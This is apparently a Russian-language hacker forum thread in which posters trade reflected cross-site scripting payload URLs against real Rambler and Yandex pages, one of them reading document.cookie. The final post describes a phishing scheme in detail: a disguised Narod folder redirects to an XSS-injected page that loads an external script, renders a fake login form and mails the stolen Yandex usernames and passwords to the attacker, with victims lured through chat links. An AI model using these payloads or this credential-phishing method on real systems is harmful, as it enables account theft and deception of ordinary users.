Да, там много чего есть. Вот ещё несколько со старых запасов: Code: http://horoscopes.rambler.ru/index.html?sign='"><script>alert('1')</script>libra&horo='"><script>alert('2')</script>2&year='"><script>alert('3')</script> Code: http://www.rambler.ru/db/news/msg.html?mid='"><script>alert('CoolPinkPanther')</script>
круто! вот только счас нашёл на яндексе =) http://cards.yandex.ru/theme.xhtml?topic="><script>alert(document.cookie)</script> блин сколько их там!?
Продолжая тему яндекса, скажу что их там много, даже очень!!!Вот опять же из старого: Code: http://news.yandex.ru/yandsearch?stype='"><script>alert()</script>
в некоторых случиях очень даже нужные, например та что я нашёл на народ.ру с помощью СИ можно будет достать пассы от yandex.ru...
Поподробней и поконкретней. Что есть пассы от yandex.ru? и каким образом их можно достать с помощью народа?
короче смысл такой: создаём сайт на народе... делаем папку под названиваем foto.jpg пихаем в неё страницу страницу index.html с перенаправлением на [http://narod.yandex.ru/100.xhtml?entermatrix.narod.ru"><script/**/src="http://entermatrix.narod.ru/foto.js"></script>] создаём анкету с 2-мя полями, в [http://entermatrix.narod.ru/foto.js] прописываем код этих полей, перед ними пишем логин и пароль... всё! теперь заходим например на чат на народе, даём какому нибудь челу ссыку на свою фоту например ***.narod.ru/foto.jpg т.к. это папка она открывает index.html, идёт перенаправление на страницу народа с моей xss в которой с помощью foto.js и прописаннными в ней формами (document.write), пишется типо введите ваш логин и пароль чтобы скачать фоту... данные отсылаются на твоё мыло прописанное при создании "анкеты", можно ещё сделать так, чтоб при нажатии кнопки перенаправляло на какуюнить картинку, можно даже фотку =) вот и всё... конечно же всё расчитано на ламера, хотя многие не смотрят на адрес страницы...
